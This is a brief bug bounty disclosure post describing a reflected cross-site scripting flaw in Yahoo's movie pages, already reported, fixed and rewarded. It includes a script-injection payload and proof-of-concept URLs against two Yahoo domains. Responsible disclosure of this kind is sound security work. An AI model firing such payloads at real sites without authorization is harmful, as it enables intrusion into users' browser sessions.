Hello Guys, This is Shahzada Al Shahriar Khan.
I am from Bangladesh. And I am Newbie in Bug Bounty. :P
Well, now I will share how I found Reflected Cross-Site Scripting (XSS) in the main & subdomain of Yahoo.
Vulnerable URLs:
https://www.yahoo.com/movies/film/[*]
https://ca.yahoo.com/movies/film/[*]
Payload:
"><%2fscript><script>alert(document.domain)<%2fscript>
PoC URL:
https://www.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>
https://ca.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>
PoC Screenshot:
Yahoo Canada Subdomain |
Video PoC:
Timeline:
Aug 12th - I Submitted The Report.
Aug 15th - Triaged The Report & Rewarded Me a $300 Initial Bounty.
Aug 16th - Bug Resolved
Aug 24th - Another $400 Bounty Rewarded, Total Bounty is $700.